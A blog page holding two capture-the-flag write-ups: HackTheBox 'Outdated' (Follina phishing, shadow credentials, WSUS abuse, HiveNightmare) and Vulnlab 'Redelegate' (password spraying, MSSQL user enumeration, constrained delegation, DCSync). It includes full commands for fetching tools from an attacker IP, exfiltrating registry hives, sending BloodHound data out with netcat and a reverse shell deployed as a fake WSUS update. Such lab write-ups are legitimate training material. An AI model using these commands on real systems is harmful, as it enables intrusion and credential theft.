Author: admin
Protected: htb-vintage
htb-outdated
HTB-OUTDATED
Summary
This machine was initially published with some unintended ways to root (i.e zerologon), and later those had been patched. The intended PE exploit is via WSUS.
This machine features several fairly new exploits such as follina, wsus etc. But in general, it’s also a bit unstable. So, exploit with patience.
Scanning
.
Enum
From the above, the target might be another exercise on AD, ldap, kerberos. Let’s find some more info.
>
enum4linux outdated.htb
Domain Name: OUTDATED
Domain Sid: S-1-5-21-4089647348-67660539-4016542185
>
smbclient -N -L outdated.htb
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance.
There is a Shares folder. Connecting to it, we can find more info.
>
smbclient -N \\\\outdated.htb\\Shares
smb: \> ls
. D 0 Mon Jun 20 11:01:33 2022
.. D 0 Mon Jun 20 11:01:33 2022
NOC_Reminder.pdf AR 106977 Mon Jun 20 11:00:32 2022
9116415 blocks of size 4096. 1440211 blocks available
smb: \> get NOC_Reminder.pdf
getting file \NOC_Reminder.pdf of size 106977 as NOC_Reminder.pdf (33.8 KiloBytes/sec) (average 33.8 KiloBytes/sec)
User: btables
We found a doc NOC_Reminder.pdf. Reading the content, we learnt that there are unpatched vulnerabilities and there is a valid email address at itsupport@outdated.htb, who checks email for links regularly.
Also, we learnt that there are some vulnerabilities unpatched, and one of them is exploitable via email: CVE-2022-30190
CVE-2022-30190 is also known as Follina, which is a relatively recent exploit on MS word/rtf docs, in which you can utilize a rarely used feature called Microsoft Support Diagnostics Tool (MSDT) that downloads malicious scripts via an embedded link. For more detail, check here: https://logrhythm.com/blog/detecting-follina-cve-2022-30190-microsoft-office-zero-day-exploit/
To exploit this, i used this exploit: https://github.com/JohnHammond/msdt-follina
Generate Payload
Use some code based on John Hammond’s POC. This POC does a lot of things, generating a Word document that will request the HTML payload, and even providing the webserver and catching the reverse shell. I’ll use just a couple lines that generate that HTML payload:
.
It’s important to note that the payload must be padded out to larger than 4096 bytes to bypass user activity.
I’ll generate this payload and save it into a file I’ll then serve with Python’s webserver.
Trigger Exploit
I’ll send the link in an email to itsupport@outdated.htb
using swaks
:
.
If this works, the user will click the link, requesting the msdt.html
page, which I’ll serve, and moments later, I should get a request to upload nc64.exe
(I’ll make sure there’s a copy in my web root) and then a shell on TCP 443. It works just like expected. Two get requests:
.
Then a shell:
User: sflowers
Now, we can collect AD information as btables, which is a domain user.
Upload SharpBound.exe to the machine and start collecting domain info.
# download SharpHound to the target
> certutil -urlcache -f http://10.10.14.10:8000/SharpHound.exe SharpHound.exe
# run SharpHound
> SharpHound.exe -c All
# send the result back
nc64.exe 10.10.14.10 5555 < 20241218170837_BloodHound.zip
> nc -nlvp 5555 > output.zip
or we use
serving smb
# impacket-smbserver -smb2support share . -user puck -pass puckpuck
on client
c:\temp>net use \\10.10.14.10\share /u:puck puckpuck
net use \\10.10.14.10\share /u:puck puckpuck
The command completed successfully.
c:\temp>copy 20241218170837_BloodHound.zip \\10.10.14.10\share\
copy 20241218170837_BloodHound.zip \\10.10.14.10\share\
1 file(s) copied.
—
Bloodhound Analyse the output finds that btables belongs to the group itstaff, and itstaff has the privilege to AddKeyCredentialLink to the user sflowers, who has psremote access to the DC.
The members of the group ITSTAFF@OUTDATED.HTB have the ability to write to the “msds-KeyCredentialLink” property on SFLOWERS@OUTDATED.HTB. Writing to this property allows an attacker to create “Shadow Credentials” on the object and authenticate as the principal using kerberos PKINIT.
To abuse this privilege, use Whisker.
You may need to authenticate to the Domain Controller as a member of ITSTAFF@OUTDATED.HTB if you are not running a process as a member
Whisker.exe add /target:<TargetPrincipal>
or abuse this privilege, use pyWhisker.
pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"
Shortest Paths to Unconstrained Delegation Systems
To get user sflowers, we need to utilise a technique called ShadowCredentials, for more detail, refer to this: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
Basically, we can add new properties to the user sflowers, so, we can add a new property as a valid credential for the user sflowers to authenticate, and we can then use the new credential we created to pull the TGT of sflowers, which we can use for persistent access as sflowers.
To do so, we need some windows exploit binaries, which can be downloaded from here: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
Note that Whisker needs to be self compiled or decompressed from here: https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries
# upload binaries
> certutil.exe -urlcache -f http://10.10.14.10:8000/Whisker.exe Whisker.exe
> certutil.exe -urlcache -f http://10.10.14.10:8000/Rubeus.exe Rubeus.exe
# run whisker to add a new property as a new credential for sflowers
> Whisker.exe add /target:sflowers
Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"81IrT8oSxfA0pBoe" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
thus
running this Rubeus.exe asktgt /user:sflowers /certificate:MII... command outputs:
At the end of whisker, it will generate a Rubeus command to pull the TGT of sflowers
> Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"el84kTr1afLpoMWG" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
Note the
NTLM : 1FCDB1F6015DCB318CC77BB2BDA14DB5
, this can be used as the
ntlm
hash for the user sflowers.
Now, we can PSRemote into the target as sflowers using the ntlm hash we obtained via shadow credential
>
evil-winrm -i outdated.htb -u sflowers -H 1FCDB1F6015DCB318CC77BB2BDA14DB5
PE: WSUS
Perform enum using winpeas, we found that there is a wsus server configured that is using non-https.
[+] Checking WSUS
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus
WSUS is using http: http://wsus.outdated.htb:8530
[i] You can test https://github.com/pimps/wsuxploit to escalate privileges
But UseWUServer is equals to , so it may work or not
We continue checking for several registry values
.
.
a non-https wsus server and UseWUServer value is 1, the machine is vulnerable to wsus attack.
The most recent is the SharpWSUS post, which gives a really nice overview of how WSUS servers work to provide updates to networks of different size and complexity.
It also has a link to a Github repo with the tool, which I’ll build in Visual Studio just like Whisker above, and upload to DC:
*Evil-WinRM* PS C:\programdata> upload SharpWSUS.exe sw.exe
Info: Uploading SharpWSUS.exe to sw.exe
Data: 65536 bytes of 65536 bytes copied
Info: Upload successful!
Identify WSUS
The registry key HKLM:\software\policies\microsoft\windows\WindowsUpdate
will show the WSUS server in use. From client:
PS C:\> Get-ItemProperty HKLM:\software\policies\microsoft\windows\WindowsUpdate
And from the DC:
*Evil-WinRM* PS C:\> get-itemproperty HKLM:\software\policies\microsoft\windows\WindowsUpdate
SharpWSUS.exe
will do this as well:
*Evil-WinRM* PS C:\programdata> .\sw.exe locate
..snip..
[*] Action: Locate WSUS Server
WSUS Server: http://wsus.outdated.htb:8530
[*] Locate complete
From client, ping
will show that it’s the same host as the DC:
PS C:\> ping wsus.outdated.htb
Resolve-DNSName
will also show this (if run from DC it needs -Server
to work):
*Evil-WinRM* PS C:\programdata> Resolve-DNSName -Name wsus.outdated.htb -Type A -Server 127.0.0.1
Name Type TTL Section NameHost
---- ---- --- ------- --------
wsus.outdated.htb CNAME 3600 Answer dc.outdated.htb
Name : dc.outdated.htb
QueryType : A
TTL : 3600
Section : Answer
IP4Address : 10.10.11.175
Name : dc.outdated.htb
QueryType : A
TTL : 3600
Section : Answer
IP4Address : 172.16.20.1
WSUS Information
SharpWSUS.exe
will also give information about the clients using the WSUS:
*Evil-WinRM* PS C:\programdata> .\sw.exe inspect
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Inspect WSUS Server
################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent
####################### Computer Enumeration #######################
ComputerName, IPAddress, OSVersion, LastCheckInTime
---------------------------------------------------
dc.outdated.htb, 172.16.20.1, 10.0.17763.652, 7/22/2022 5:01:44 AM
####################### Downstream Server Enumeration #######################
ComputerName, OSVersion, LastCheckInTime
---------------------------------------------------
####################### Group Enumeration #######################
GroupName
---------------------------------------------------
All Computers
Downstream Servers
Unassigned Computers
[*] Inspect complete
It only shows the DC, but that’s where I want SYSTEM anyway.
Exploit
PsExec
WSUS will only run signed Microsoft binaries. As I have no good way to get a MS signing certificate, I’ll have to use something legit. The article suggests the Sysintenals tool, PSExec. I’ll download Sysinternals, copy PsExec.exe
to my webserver, and upload it:
*Evil-WinRM* PS C:\programdata> upload PsExec64.exe \programdata\ps.exe
Info: Uploading PsExec64.exe to \programdata\ps.exe
Data: 685960 bytes of 685960 bytes copied
Info: Upload successful!
Create/Approve Update
I’ll create an update using SharpWSUS.exe
. The blog post shows adding an administrator, but I’ll just go for a reverse shell using nc64.exe
. The /args
for PsExec are -accepteula
so that it doesn’t pop a box and wait for a click, -s
to run as system, and -d
to return immediately. The /title
is arbitrary.
*Evil-WinRM* PS C:\programdata> .\sw.exe create /payload:"C:\programdata\ps.exe" /args:" -accepteula -s -d c:\programdata\nc64.exe -e cmd.exe 10.10.14.6 445" /title:"CVE-2022-30190"
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Create Update
[*] Creating patch to use the following:
[*] Payload: ps.exe
[*] Payload Path: C:\programdata\ps.exe
[*] Arguments: -accepteula -s -d c:\programdata\nc64.exe -e cmd.exe 10.10.14.6 445
[*] Arguments (HTML Encoded): -accepteula -s -d c:\programdata\nc64.exe -e cmd.exe 10.10.14.6 445
################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent
ImportUpdate
Update Revision ID: 44
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 45
PrepareXMLBundletoClient
DeploymentRevision
[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:Target.FQDN /groupname:"Group Name"
[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:Target.FQDN
[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:Target.FQDN /groupname:"Group Name"
[*] Create complete
I need to approve that Update, using the syntax given in the output (/groupname
is arbitrary):
*Evil-WinRM* PS C:\programdata> .\sw.exe approve /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:dc.outdated.htb /groupname:"CriticalPatches"
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Approve Update
Targeting dc.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
dc.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1
Group Exists = False
Group Created: CriticalPatches
Added Computer To Group
Approved Update
[*] Approve complete
It takes about a minute for this to fire, and it fails occasionally. If it fails, I’ll try again, but eventually there’s a connection at nc
:
Beyond Root – Skipped Steps
PyWhisker Background
With a shell in the Hyper-V Container, I built an EXE version of Whisker. There’s also a Python version of the exploit, pywhisker. It does the same thing, but I’ll execute it from my attack station. The problem is, that to run it I’ll need some creds for the domain. This wasn’t an issue with the EXE version, as it was running in the context of btables, and used what Windows had cached for the user to auth. But to run it from my VM, I’ll need creds.
The Author’s intended path for this box was to exploit HiveNightmare to get creds for btables, and then use those to run pywhisker. That wasn’t necessary, but I’ll still show it here.
HiveNightmare
Background
In July 2021, a researcher noticed that the permissions for the raw registry hive files was misconfigured starting in Windows 10 build 1809, which first released to the public in October 2018. This got the designation CVE-2021-36934, as well as the names HiveNightmare and SeriousSAM.
icacls
shows that the SAM
file is readable by all users:
C:\>icacls C:\windows\system32\config\SAM
C:\windows\system32\config\SAM BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
Get Hive Files
Interestingly, I still can’t just copy the files. But a tool like HiveNightmare from researcher GossiTheDog will pull it for me. I’ll grab the compiled EXE from the release page.
I’ll upload it using wget
and run it:
PS C:\ProgramData> wget 10.10.14.6/HiveNightmare.exe -outfile hn.exe
PS C:\ProgramData> ./hn
HiveNightmare v0.6 - dump registry hives as non-admin users
Specify maximum number of shadows to inspect with parameter if wanted, default is 15.
Running...
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SAM
Success: SAM hive from 2022-08-02 written out to current working directory as SAM-2022-08-02
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SECURITY
Success: SECURITY hive from 2022-08-02 written out to current working directory as SECURITY-2022-08-02
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM
Success: SYSTEM hive from 2022-08-02 written out to current working directory as SYSTEM-2022-08-02
Assuming no errors above, you should be able to find hive dump files in current working directory.
It does create copies of the hives in the current directory:
PS C:\ProgramData> ls
Directory: C:\ProgramData
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 6/15/2022 6:30 PM Microsoft
d----- 6/15/2022 9:24 AM Microsoft OneDrive
d----- 6/15/2022 9:40 AM Packages
d----- 8/1/2022 7:41 PM regid.1991-06.com.microsoft
d----- 12/7/2019 1:14 AM SoftwareDistribution
d----- 4/9/2021 6:54 AM ssh
d----- 6/15/2022 9:53 AM USOPrivate
d----- 12/7/2019 1:14 AM USOShared
-a---- 8/3/2022 2:10 PM 227328 hn.exe
-a---- 8/3/2022 2:08 PM 45272 nc64.exe
-a---- 8/3/2022 2:10 PM 65536 SAM-2022-08-02
-a---- 8/3/2022 2:10 PM 32768 SECURITY-2022-08-02
-a---- 8/3/2022 2:10 PM 11534336 SYSTEM-2022-08-02
Exfil
To exfil these, I’ll start an SMB server on my box:
I’ll connect to it from Outdated, and then copy the files:
PS C:\ProgramData> net use \\10.10.14.10\share /u:puck 0puckpuck
The command completed successfully.
PS C:\ProgramData> copy *-12-14 \\10.10.14.10\share\
PS C:\ProgramData> copy *-13 \\10.10.14.10\share\
Dump Hashes
With access to these hives, secretsdump.py
will return the hashes:
This also includes a plaintext “DefaultPassword” for an unknown user of “5myBPLPDKT3Bfq”. That suggests it’s probably a domain user, and not a local user.
crackmapexec
shows these creds are good for btables:
Remote Shadow Credentials
PyWhisker
With creds, I can try to remotely run PyWhisker. It fails:
This shows that the LDAP bind failed, TLS is required. Adding --use-ldaps
fixes it:
sflowers has no shadow credentials. I’ll add one:
PKINITtools
The PyWhisker output suggests using PKINITtools to get a TGT. I’ll do that:
.
.
For the last step, I’ll need to run the getnthash.py
script. I had some issues on my system getting the Python dependencies to run, so I just created a virtual environment (python -m venv venv
, and then source venv/bin/activate
) and installed the requirements again in there (pip install -r requirements.txt
). Then it worked:
With that hash, I can get an Evil-WinRM session
.
Get the hashes
add user
then secretsdump
That was Fun!
Protected: htb-certified
vulnlab-redelegate
vulnlab-redelegate
vulnlab redelegate
Redelegate is a hard-rated Windows machine by Geiseric on Vulnlab. The core concepts here are password spraying, enumerating domain users via MSSQL and diving deeper into kerberos delegation.
Enumeration
Portscan:
... PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 53/tcp open domain? 80/tcp open http Microsoft IIS httpd 10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-23 11:19:37Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 1433/tcp open ms-sql-s Microsoft SQL Server 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |
We are dealing with a domain controller, unusual services are FTP (21) and MSSQL (1433). Let’s check FTP first:
└─$ ftp redelegate.vl Connected to dc.redelegate.vl. 220 Microsoft FTP Service Name (redelegate.vl:puck): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls 229 Entering Extended Passive Mode (|||55855|) 125 Data connection already open; Transfer starting. 10-20-24 12:11AM 434 CyberAudit.txt 10-20-24 04:14AM 2622 Shared.kdbx 10-20-24 12:26AM 580 TrainingAgenda.txt 226 Transfer complete. ftp> binary 200 Type set to I. ftp> mget * |
Note that binary mode was used to download the files. The file CyberAudit.txt
contains
The file TrainingAgenda.txt
shows
we could try, generate a simple word list with something like “SeasonYear!”.
Since we don’t have any domain users yet, we can only try them against the KeePass file Shared.kdbx
, which was also on the share:
.
We found the password and can now open the KeePass file, for example with keepassxc
. One of the credentials inside is for MSSQL which we saw running on the machine, so we try to connect:
.
This works but we just have guest access. One thing we could try is to use xp_dirtree
to get the hash of the service account running the service, but in this case it won’t help. Instead we are going to enumerate domain users from here (even though the sqlguest account is not a domain user).
First, we get the domain name:
Next we get the Domain SID by querying one of the default groups for it (the first 48 bytes will be the domain SID):
We can convert this to a readable string with PowerShell:
We can now enumerate users by appending something different on the part that identifies the user (here 512). For example with a quick bash loop:
Running it gives the domain users we want:
Getting a Foothold
Now that we have a list of users, we can spray the password scheme that we learned about earlier against those users:
This leads to our first domain user credentials. At this point we can do a lot more enumeration like for example checking shares authenticated and gathering bloodhound data. First we gather bloodhound data:
After loading it into bloodhound, we notice that there is a path to high value targets from our user:
To change the password of that user, we can use the following command:
This gives us a shell on the domain controller and our first flag.
Privilege Escalation
First we check our privileges and notice that this user has the SeEnableDelegationPrivilege
, which means that the user can enable delegation privileges on the domain.
This is a dangerous privilege that allows to escalate privileges in multiple ways. Let’s take this opportunity to remember the 3 types of delegation:
Unconstrained Delegation: A machine configured with Unconstrained Delegation will store any TGT of users connecting to it in memory. This allows the machine to then impersonate that user. To configure this, the userAccountControl attribute of the machine gets modified to include the TRUSTED_FOR_DELEGATION
flag (which requires the SeEnableDelegationPrivilege
domain privilege).
Constrained Delegation: A machine configured with Constrained Delegation will be able to impersonate any user against another machine. To configure this, the userAccountControl attribute of the object gets modified to include the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION
flag (which requires the SeEnableDelegationPrivilege
privilege) and the msDS-AllowedToDelegateTo
attribute gets set to the target spn that we want to authenticate as any user against.
Resource-Based Constrained Delegation: A machine configured with Resource-Based Constrained Delegation will trust another user to impersonate any user on itself. To configure this the AllowedToActOnBehalfOfOtherIdentity
property must be set to the SID of the object that is allowed to control it. This does not require SeEnableDelegationPrivilege
and the machine can modify it on itself.
So in other words, RBCD is a privilege given by a machine account on itself and does not require any special privileges, while both Unconstrained- and Constrained Delegation do require the SeEnableDelegationPrivilege
because those affect other resources in the domain.
With this information, we can rule out RBCD and focus on the other delegations. As seen on the predecessor machine “Delegate”, we could add a machine account, configure it with unconstrained delegation and then coerce the domain controller to authenticate to that machine. This would require the ability to add machine accounts and also to add DNS entries (for the coercion – kerberos works with names instead of ip addresses). Both is not possible in this case, since the environment has been hardened.
This leaves us with only Constrained Delegation which does not require a new DNS entry. It does however also require control of a machine account. Luckily in this case, the user helen.frost
has GenericAll
privileges on a computer object called FS01$
. This allows us to reset the password of that computer object (alternatively Shadow Credentials could be used, if there would be a configured CA):
Additionally, we need to use our SeEnableDelegationPrivilege
to make the necessary changes:
As described earlier we set msDS-AllowedToDelegateTo
to the resource we want to control (ldap on the domain controller in order to perform a dcsync) and the TrustedToAuthForDelegation
flag.
Now we can use the credentials of the fs01 machine account to request a service ticket as any user (here the dc itself) to the dc:
Since this is a ticket for ldap, it allows us to perform dcsync:
.
With the admin hash we can now connect to the DC and read the final flag. If you want to try out the machine, join Vulnlab 🙂
Resources